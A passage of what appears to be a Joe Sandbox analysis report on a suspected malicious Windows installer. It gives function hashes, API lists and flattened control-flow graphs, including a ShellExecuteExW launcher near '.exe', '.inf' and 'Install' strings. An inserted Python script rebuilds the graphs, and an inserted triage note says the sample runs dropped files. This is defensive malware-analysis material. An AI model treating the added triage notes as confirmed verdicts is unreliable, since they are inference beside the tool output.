• Instruction Fuzzy Hash: A161D672A0CA4691DA10EB24E84427EA361FF857A4F904331EABD437D8EF3ED584C710
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 0-112844655
                                                                                                                                                                          • Opcode ID: 38fcd14a0c0e22dcc02e21086db45a874c8db68944d9ab85a23f3bc0e9adee56
                                                                                                                                                                          • Instruction ID: 7db685667dccac08574de7c87c098d6db5174d4dc600c411d4abea37c8ae8b53
                                                                                                                                                                          • Opcode Fuzzy Hash: 38fcd14a0c0e22dcc02e21086db45a874c8db68944d9ab85a23f3bc0e9adee56
                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE1E533A186819BE724DF28D8402BEB7A1FB8874CF544139DA5D57B88DB3EE851DB10
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4cb80b51aadf55173622e9201162bdeefa438da09f0e939214a635ea07f0a5fc
                                                                                                                                                                          • Instruction ID: c16ce12f9fc56576cb1f58b2d90e9993357f0efed6a1aeb2f5659317df9b2488
                                                                                                                                                                          • Opcode Fuzzy Hash: 4cb80b51aadf55173622e9201162bdeefa438da09f0e939214a635ea07f0a5fc
                                                                                                                                                                          • Instruction Fuzzy Hash: 862225B2E2CA52A2EA10AB249C5017EF790FF6075CF990135DA5E477D4DF7EE800A760

Control-flow Graph (entry block 7ff70ecf5390; the rendered graph with its Executed / Not Executed colouring is not reproduced)
• API calls in the graph: RaiseException, LoadLibraryExA, GetLastError, FreeLibrary, GetProcAddress
• Internal calls: 7ff70ecf4fe8, 7ff70ecf52f8
• Graph dump (block id, address or address range, calls; edges as id->id):
control_flow_graph 1724 7ff70ecf5390-7ff70ecf5419 call 7ff70ecf4fe8 1727 7ff70ecf5444-7ff70ecf5461 1724->1727 1728 7ff70ecf541b-7ff70ecf543f call 7ff70ecf52f8 RaiseException 1724->1728 1730 7ff70ecf5476-7ff70ecf547a 1727->1730 1731 7ff70ecf5463-7ff70ecf5474 1727->1731 1736 7ff70ecf5648-7ff70ecf5665 1728->1736 1733 7ff70ecf547d-7ff70ecf5489 1730->1733 1731->1733 1734 7ff70ecf548b-7ff70ecf549d 1733->1734 1735 7ff70ecf54aa-7ff70ecf54ad 1733->1735 1744 7ff70ecf54a3 1734->1744 1745 7ff70ecf5619-7ff70ecf5623 1734->1745 1737 7ff70ecf54b3-7ff70ecf54b6 1735->1737 1738 7ff70ecf5554-7ff70ecf555b 1735->1738 1742 7ff70ecf54cd-7ff70ecf54e2 LoadLibraryExA 1737->1742 1743 7ff70ecf54b8-7ff70ecf54cb 1737->1743 1740 7ff70ecf556f-7ff70ecf5572 1738->1740 1741 7ff70ecf555d-7ff70ecf556c 1738->1741 1746 7ff70ecf5615 1740->1746 1747 7ff70ecf5578-7ff70ecf557c 1740->1747 1741->1740 1748 7ff70ecf54e4-7ff70ecf54f7 GetLastError 1742->1748 1749 7ff70ecf5539-7ff70ecf5542 1742->1749 1743->1742 1743->1749 1744->1735 1756 7ff70ecf5625-7ff70ecf5636 1745->1756 1757 7ff70ecf5640 call 7ff70ecf52f8 1745->1757 1746->1745 1754 7ff70ecf557e-7ff70ecf5582 1747->1754 1755 7ff70ecf55ab-7ff70ecf55be GetProcAddress 1747->1755 1758 7ff70ecf550e-7ff70ecf5534 call 7ff70ecf52f8 RaiseException 1748->1758 1759 7ff70ecf54f9-7ff70ecf550c 1748->1759 1750 7ff70ecf5544-7ff70ecf5547 FreeLibrary 1749->1750 1751 7ff70ecf554d 1749->1751 1750->1751 1751->1738 1754->1755 1761 7ff70ecf5584-7ff70ecf558f 1754->1761 1755->1746 1760 7ff70ecf55c0-7ff70ecf55d3 GetLastError 1755->1760 1756->1757 1769 7ff70ecf5645 1757->1769 1758->1736 1759->1749 1759->1758 1765 7ff70ecf55d5-7ff70ecf55e8 1760->1765 1766 7ff70ecf55ea-7ff70ecf5611 call 7ff70ecf52f8 RaiseException call 7ff70ecf4fe8 1760->1766 1761->1755 1767 7ff70ecf5591-7ff70ecf5598 1761->1767 1765->1746 1765->1766 1766->1746 1767->1755 1771 7ff70ecf559a-7ff70ecf559f 1767->1771 1769->1736 1771->1755 1774 7ff70ecf55a1-7ff70ecf55a9 1771->1774 1774->1746 1774->1755
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 282135826-2852464175
                                                                                                                                                                          • Opcode ID: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                                                                                                                                                          • Instruction ID: 6f08dfaed9f23ddbd7fc9e54858eefaf83f0f5bc941634411979e10b8ae4f1aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                                                                                                                                                          • Instruction Fuzzy Hash: 49916C32A19B529AEB00EF65DC546ADB3A1FF08799F894436DE0D07B54EF39E844C720
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF70ECD9254: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70ECD9389
                                                                                                                                                                          • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70ECDA375
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECDA82F
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECDA835
                                                                                                                                                                            • Part of subcall function 00007FF70ECE033C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF70ECD9CBA), ref: 00007FF70ECE0369
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                                                                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                                                          • API String ID: 3629253777-3268106645
                                                                                                                                                                          • Opcode ID: 988e682dbb3b4c783be54ccfebef63e85019313b811fb06679e680b09018e736
                                                                                                                                                                          • Instruction ID: bed128e57b34e41f6b8ad3e1ff29893fad78eada82d8cf48c304541397caf56a
                                                                                                                                                                          • Opcode Fuzzy Hash: 988e682dbb3b4c783be54ccfebef63e85019313b811fb06679e680b09018e736
                                                                                                                                                                          • Instruction Fuzzy Hash: 4562BE62A1DA82A5EB10EB25C8482BEA365FF40784FC04132DA5E476D5EF7FE545C360

Control-flow Graph (entry block 7ff70ecf3030; the rendered graph with its Executed / Not Executed colouring is not reproduced)
• API calls in the graph: ShellExecuteExW, IsWindowVisible, ShowWindow, WaitForInputIdle, CloseHandle, GetExitCodeProcess
• Internal calls: 7ff70ecd1b70, 7ff70ecf5c30, 7ff70ecf74c0, 7ff70ecd7b68, 7ff70ece0aa0, 7ff70ecfaf0c, 7ff70ecd12bc, 7ff70ecd587c, 7ff70ecd72ac, 7ff70ecf3928, 7ff70ecf5b1c, 7ff70ecfae94
• Graph dump (block id, address or address range, calls; edges as id->id):
control_flow_graph 2087 7ff70ecf3030-7ff70ecf3073 2088 7ff70ecf33e4-7ff70ecf3409 call 7ff70ecd1b70 call 7ff70ecf5c30 2087->2088 2089 7ff70ecf3079-7ff70ecf30b5 call 7ff70ecf74c0 2087->2089 2095 7ff70ecf30ba-7ff70ecf30c1 2089->2095 2096 7ff70ecf30b7 2089->2096 2098 7ff70ecf30c3-7ff70ecf30c7 2095->2098 2099 7ff70ecf30d2-7ff70ecf30d6 2095->2099 2096->2095 2102 7ff70ecf30cc-7ff70ecf30d0 2098->2102 2103 7ff70ecf30c9 2098->2103 2100 7ff70ecf30db-7ff70ecf30e6 2099->2100 2101 7ff70ecf30d8 2099->2101 2104 7ff70ecf30ec 2100->2104 2105 7ff70ecf3178 2100->2105 2101->2100 2102->2100 2103->2102 2106 7ff70ecf30f2-7ff70ecf30f9 2104->2106 2107 7ff70ecf317c-7ff70ecf317f 2105->2107 2108 7ff70ecf30fe-7ff70ecf3103 2106->2108 2109 7ff70ecf30fb 2106->2109 2110 7ff70ecf3181-7ff70ecf3185 2107->2110 2111 7ff70ecf3187-7ff70ecf318a 2107->2111 2112 7ff70ecf3135-7ff70ecf3140 2108->2112 2113 7ff70ecf3105 2108->2113 2109->2108 2110->2111 2114 7ff70ecf31b0-7ff70ecf31c3 call 7ff70ecd7b68 2110->2114 2111->2114 2115 7ff70ecf318c-7ff70ecf3193 2111->2115 2116 7ff70ecf3145-7ff70ecf314a 2112->2116 2117 7ff70ecf3142 2112->2117 2118 7ff70ecf311a-7ff70ecf3120 2113->2118 2132 7ff70ecf31c5-7ff70ecf31e3 call 7ff70ece0aa0 2114->2132 2133 7ff70ecf31e8-7ff70ecf323d call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecd587c call 7ff70ecd1b70 2114->2133 2115->2114 2119 7ff70ecf3195-7ff70ecf31ac 2115->2119 2121 7ff70ecf3150-7ff70ecf3157 2116->2121 2122 7ff70ecf340a-7ff70ecf3411 2116->2122 2117->2116 2123 7ff70ecf3122 2118->2123 2124 7ff70ecf3107-7ff70ecf310e 2118->2124 2119->2114 2126 7ff70ecf315c-7ff70ecf3162 2121->2126 2127 7ff70ecf3159 2121->2127 2128 7ff70ecf3416-7ff70ecf341b 2122->2128 2129 7ff70ecf3413 2122->2129 2123->2112 2130 7ff70ecf3113-7ff70ecf3118 2124->2130 2131 7ff70ecf3110 2124->2131 2126->2122 2136 7ff70ecf3168-7ff70ecf3172 2126->2136 2127->2126 2137 7ff70ecf341d-7ff70ecf3424 2128->2137 2138 7ff70ecf342e-7ff70ecf3436 2128->2138 2129->2128 2130->2118 2139 7ff70ecf3124-7ff70ecf312b 2130->2139 2131->2130 2132->2133 2154 7ff70ecf3292-7ff70ecf329f ShellExecuteExW 2133->2154 2155 7ff70ecf323f-7ff70ecf328d call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecd72ac call 7ff70ecd1b70 2133->2155 2136->2105 2136->2106 2142 7ff70ecf3426 2137->2142 2143 7ff70ecf3429 2137->2143 2144 7ff70ecf343b-7ff70ecf3446 2138->2144 2145 7ff70ecf3438 2138->2145 2146 7ff70ecf3130 2139->2146 2147 7ff70ecf312d 2139->2147 2142->2143 2143->2138 2144->2107 2145->2144 2146->2112 2147->2146 2156 7ff70ecf32a5-7ff70ecf32af 2154->2156 2157 7ff70ecf3396-7ff70ecf339e 2154->2157 2155->2154 2159 7ff70ecf32b1-7ff70ecf32b4 2156->2159 2160 7ff70ecf32bf-7ff70ecf32c2 2156->2160 2161 7ff70ecf33d2-7ff70ecf33df 2157->2161 2162 7ff70ecf33a0-7ff70ecf33b6 2157->2162 2159->2160 2164 7ff70ecf32b6-7ff70ecf32bd 2159->2164 2165 7ff70ecf32c4-7ff70ecf32cf IsWindowVisible 2160->2165 2166 7ff70ecf32de-7ff70ecf32f1 WaitForInputIdle call 7ff70ecf3928 2160->2166 2161->2088 2167 7ff70ecf33cd call 7ff70ecf5b1c 2162->2167 2168 7ff70ecf33b8-7ff70ecf33cb 2162->2168 2164->2160 2170 7ff70ecf3333-7ff70ecf3340 CloseHandle 2164->2170 2165->2166 2171 7ff70ecf32d1-7ff70ecf32dc ShowWindow 2165->2171 2180 7ff70ecf32f6-7ff70ecf32fd 2166->2180 2167->2161 2168->2167 2173 7ff70ecf344b-7ff70ecf3453 call 7ff70ecfae94 2168->2173 2178 7ff70ecf3355-7ff70ecf335c 2170->2178 2179 7ff70ecf3342-7ff70ecf3353 call 7ff70ece0aa0 2170->2179 2171->2166 2184 7ff70ecf337e-7ff70ecf3380 2178->2184 2185 7ff70ecf335e-7ff70ecf3361 2178->2185 2179->2178 2179->2184 2180->2170 2186 7ff70ecf32ff-7ff70ecf3302 2180->2186 2184->2157 2190 7ff70ecf3382-7ff70ecf3385 2184->2190 2185->2184 2189 7ff70ecf3363-7ff70ecf3378 2185->2189 2186->2170 2191 7ff70ecf3304-7ff70ecf3315 GetExitCodeProcess 2186->2191 2189->2184 2190->2157 2194 7ff70ecf3387-7ff70ecf3395 ShowWindow 2190->2194 2191->2170 2192 7ff70ecf3317-7ff70ecf332c 2191->2192 2192->2170 2194->2157
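Both control-flow graphs in this part of the report (the LoadLibraryExA / GetProcAddress / RaiseException function at 7ff70ecf5390 and the ShellExecuteExW launcher at 7ff70ecf3030) survive only as the flat token list that the rendered graph image left behind. The script below is an added example, not Joe Sandbox code and not part of the report: it parses that token format back into basic blocks and edges, reports which API calls are reachable from the function entry and along which blocks, and emits Graphviz DOT so the graph can be redrawn. The grammar it assumes (block id, then an address or address range, optional `call <addr>` entries and bare API names, edges written as `id->id`) is inferred from the dump text on this page; the embedded input is the first graph copied verbatim and re-wrapped. Two triage notes the parsed output makes visible: the first function's API mix, together with the DloadSection / AcquireSectionWriteAccess / ProtectSection identifiers in its Similarity block, is consistent with the MSVC delay-load import helper, compiler runtime rather than the sample's own dynamic API resolution; the second function launches a file via ShellExecuteExW and then waits on the resulting process (WaitForInputIdle, GetExitCodeProcess, CloseHandle) beside the strings .exe, .inf and Install, so that is where the dropped-file execution the report flags is wired up.

```python
"""Rebuild a Joe Sandbox control-flow graph from the flattened text that the
report's rendered graph image leaves behind when the page is extracted.

Token grammar of the dump (inferred from the report text, an assumption):
    <id> <start>[-<end>] [call <addr>]* [<ApiName>]*   one basic block
    <id>-><id>                                         one edge
Blocks and edges may be interleaved in any order.
"""
import re
from collections import deque

NODE_ID = re.compile(r"^\d+$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDR = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")

# Constructed input: the dump for the function at 7ff70ecf5390, copied from the
# report text and re-wrapped. Whitespace is not significant.
CFG_DUMP = """
control_flow_graph 1724 7ff70ecf5390-7ff70ecf5419 call 7ff70ecf4fe8
1727 7ff70ecf5444-7ff70ecf5461 1724->1727
1728 7ff70ecf541b-7ff70ecf543f call 7ff70ecf52f8 RaiseException 1724->1728
1730 7ff70ecf5476-7ff70ecf547a 1727->1730 1731 7ff70ecf5463-7ff70ecf5474 1727->1731
1736 7ff70ecf5648-7ff70ecf5665 1728->1736 1733 7ff70ecf547d-7ff70ecf5489 1730->1733
1731->1733 1734 7ff70ecf548b-7ff70ecf549d 1733->1734
1735 7ff70ecf54aa-7ff70ecf54ad 1733->1735 1744 7ff70ecf54a3 1734->1744
1745 7ff70ecf5619-7ff70ecf5623 1734->1745 1737 7ff70ecf54b3-7ff70ecf54b6 1735->1737
1738 7ff70ecf5554-7ff70ecf555b 1735->1738
1742 7ff70ecf54cd-7ff70ecf54e2 LoadLibraryExA 1737->1742
1743 7ff70ecf54b8-7ff70ecf54cb 1737->1743 1740 7ff70ecf556f-7ff70ecf5572 1738->1740
1741 7ff70ecf555d-7ff70ecf556c 1738->1741 1746 7ff70ecf5615 1740->1746
1747 7ff70ecf5578-7ff70ecf557c 1740->1747 1741->1740
1748 7ff70ecf54e4-7ff70ecf54f7 GetLastError 1742->1748
1749 7ff70ecf5539-7ff70ecf5542 1742->1749 1743->1742 1743->1749 1744->1735
1756 7ff70ecf5625-7ff70ecf5636 1745->1756 1757 7ff70ecf5640 call 7ff70ecf52f8 1745->1757
1746->1745 1754 7ff70ecf557e-7ff70ecf5582 1747->1754
1755 7ff70ecf55ab-7ff70ecf55be GetProcAddress 1747->1755
1758 7ff70ecf550e-7ff70ecf5534 call 7ff70ecf52f8 RaiseException 1748->1758
1759 7ff70ecf54f9-7ff70ecf550c 1748->1759 1750 7ff70ecf5544-7ff70ecf5547 FreeLibrary 1749->1750
1751 7ff70ecf554d 1749->1751 1750->1751 1751->1738 1754->1755
1761 7ff70ecf5584-7ff70ecf558f 1754->1761 1755->1746
1760 7ff70ecf55c0-7ff70ecf55d3 GetLastError 1755->1760 1756->1757
1769 7ff70ecf5645 1757->1769 1758->1736 1759->1749 1759->1758
1765 7ff70ecf55d5-7ff70ecf55e8 1760->1765
1766 7ff70ecf55ea-7ff70ecf5611 call 7ff70ecf52f8 RaiseException call 7ff70ecf4fe8 1760->1766
1761->1755 1767 7ff70ecf5591-7ff70ecf5598 1761->1767 1765->1746 1765->1766
1766->1746 1767->1755 1771 7ff70ecf559a-7ff70ecf559f 1767->1771 1769->1736
1771->1755 1774 7ff70ecf55a1-7ff70ecf55a9 1771->1774 1774->1746 1774->1755
"""


def parse_cfg(dump):
    """Return (entry_id, nodes, edges). nodes: id -> {addr, calls, apis}."""
    tokens = dump.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, entry, cur = {}, [], None, None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append(edge.groups())
        elif NODE_ID.match(tok):
            # A block id is always followed by its address; consume it positionally
            # so a hex address can never be mistaken for an API name.
            i += 1
            if i == len(tokens) or not ADDR.match(tokens[i]):
                raise ValueError(f"block {tok} is not followed by an address")
            cur = nodes.setdefault(tok, {"addr": tokens[i], "calls": [], "apis": []})
            entry = entry or tok  # first block listed is the function entry
        elif cur is None:
            raise ValueError(f"unexpected token before first block: {tok!r}")
        elif tok == "call":
            i += 1
            if i == len(tokens):
                raise ValueError("dangling 'call' at end of dump")
            cur["calls"].append(tokens[i])
        else:
            cur["apis"].append(tok)  # bare identifier: an imported API name
        i += 1
    unknown = {n for e in edges for n in e} - nodes.keys()
    if unknown:
        raise ValueError(f"edges reference undefined blocks: {sorted(unknown)}")
    return entry, nodes, edges


def reachable_apis(entry, nodes, edges):
    """Map each API name to the shortest block path from entry that reaches it.

    Breadth-first search dequeues blocks in non-decreasing distance, so the first
    block on which an API is seen is on a shortest path to that API.
    """
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    path = {entry: [entry]}
    first_seen = {}
    queue = deque([entry])
    while queue:
        n = queue.popleft()
        for api in nodes[n]["apis"]:
            first_seen.setdefault(api, path[n])
        for s in succ.get(n, []):
            if s not in path:
                path[s] = path[n] + [s]
                queue.append(s)
    return first_seen


def to_dot(nodes, edges):
    """Emit Graphviz DOT so the graph can be re-rendered with `dot -Tpng`."""
    lines = ["digraph cfg {", "  node [shape=box fontname=monospace];"]
    for nid, n in nodes.items():
        label = n["addr"]
        label += "".join(f"\\ncall {c}" for c in n["calls"])
        label += "".join(f"\\n{a}" for a in n["apis"])
        lines.append(f'  n{nid} [label="{label}"];')
    lines.extend(f"  n{a} -> n{b};" for a, b in edges)
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    entry, nodes, edges = parse_cfg(CFG_DUMP)
    print(f"entry block {entry} at {nodes[entry]['addr']}: "
          f"{len(nodes)} blocks, {len(edges)} edges")
    for api, blocks in reachable_apis(entry, nodes, edges).items():
        print(f"{api:16s} via {' -> '.join(blocks)}")
```

To work on the second graph, paste its dump into `CFG_DUMP` (or read it from a file); the same grammar applies. The BFS gives a shortest path by block count, not the executed path, since the dump does not carry the Executed / Not Executed colouring of the rendered image.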
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: .exe$.inf$Install$p
                                                                                                                                                                          • API String ID: 148627002-3607691742
                                                                                                                                                                          • Opcode ID: 6deefb2a834960e7b68e4e93846fd8f06666f90d337fa731353736b6af53a45e
                                                                                                                                                                          • Instruction ID: bc6cb0a1fd5c1c190a4e6804d654ae8e49f2870e53aa99ada0531ccd41c3d204
                                                                                                                                                                          • Opcode Fuzzy Hash: 6deefb2a834960e7b68e4e93846fd8f06666f90d337fa731353736b6af53a45e
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FC18E22F1C682B5EB10EB69DD6427EA7A1EF85B80F848035DE4D477A4DF3EE4558320

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3569833718-0
                                                                                                                                                                          • Opcode ID: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
                                                                                                                                                                          • Instruction ID: c0cd67dca3221b64d7b5df7e898d3f4f0374393f229566268bd28240e81c80aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E41BF3AB146468AF720AF71ED10BEE6761EF49B98F844232DD1A47BA4CF3DD4458720

                                                                                                                                                                          Control-flow Graph

[Control-flow graph 2237 (rendered image not preserved): single basic block 7ff70ece218c-7ff70ece219f with a call to 7ff70ecf57cc]
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                          • String ID: AES-0017$map/set too long$z01$zip$zipx$zx01
                                                                                                                                                                          • API String ID: 909987262-704999473
                                                                                                                                                                          • Opcode ID: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                                                                                                                                                          • Instruction ID: 471931232284c129dfa9fc8a37bd333e100af5f01928caa8156b72a01d74fb39
                                                                                                                                                                          • Opcode Fuzzy Hash: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                                                                                                                                                          • Instruction Fuzzy Hash: 1FB01218D3410ED0D02CF7808C550648310DF14700ED00C31C31C8FC910F3874424213

                                                                                                                                                                          Control-flow Graph

[Control-flow graph 2291 (rendered image not preserved): basic blocks from 7ff70ecd46a0 to 7ff70ecd491b; API calls CreateFileW, GetLastError, SetFileTime; internal calls to 7ff70ecd80b0, 7ff70ecf5c30, 7ff70ecd1c80, 7ff70ecf5b1c, 7ff70ecfae94]
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3536497005-0
                                                                                                                                                                          • Opcode ID: 64065e44ed69f287c1fc4df0ebb383c09c812fcb12eb8c70a13a9516b9cf0ef5
                                                                                                                                                                          • Instruction ID: 37746da03d2a724053b0e7891833b4511853a9795220d0564e01261d4ba760f7
                                                                                                                                                                          • Opcode Fuzzy Hash: 64065e44ed69f287c1fc4df0ebb383c09c812fcb12eb8c70a13a9516b9cf0ef5
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C61F266A1878195E724AB29E84036EA7A1FF857A8F500335DFBD43AD8CF3ED464C710

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2092733347-0
                                                                                                                                                                          • Opcode ID: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                                                                                                                                                          • Instruction ID: a19c72c001729773d66e26988bb9945b26654f3ba93dd6b6ed73b0c8bed8685f
                                                                                                                                                                          • Opcode Fuzzy Hash: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                                                                                                                                                          • Instruction Fuzzy Hash: 09311562B146519EFB00DFB5D8802AC7770FF18758B94503AEE0EA7A98EB38D895C310

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadBitmapW.USER32 ref: 00007FF70ECEEB7A
                                                                                                                                                                          • GetObjectW.GDI32 ref: 00007FF70ECEEBAB
                                                                                                                                                                          • DeleteObject.GDI32 ref: 00007FF70ECEEBE5
                                                                                                                                                                          • DeleteObject.GDI32 ref: 00007FF70ECEEC15
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF70ECF4517), ref: 00007FF70ECEC279
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF70ECF4517), ref: 00007FF70ECEC295
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF70ECF4517), ref: 00007FF70ECEC2AF
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF70ECF4517), ref: 00007FF70ECEC2C1
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: GlobalAlloc.KERNELBASE ref: 00007FF70ECEC2E2
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: GlobalLock.KERNEL32 ref: 00007FF70ECEC2F7
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: CreateStreamOnHGlobal.COMBASE ref: 00007FF70ECEC324
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF70ECEC3A5
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: GlobalUnlock.KERNEL32 ref: 00007FF70ECEC3C8
                                                                                                                                                                            • Part of subcall function 00007FF70ECEC260: GlobalFree.KERNEL32 ref: 00007FF70ECEC3D1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
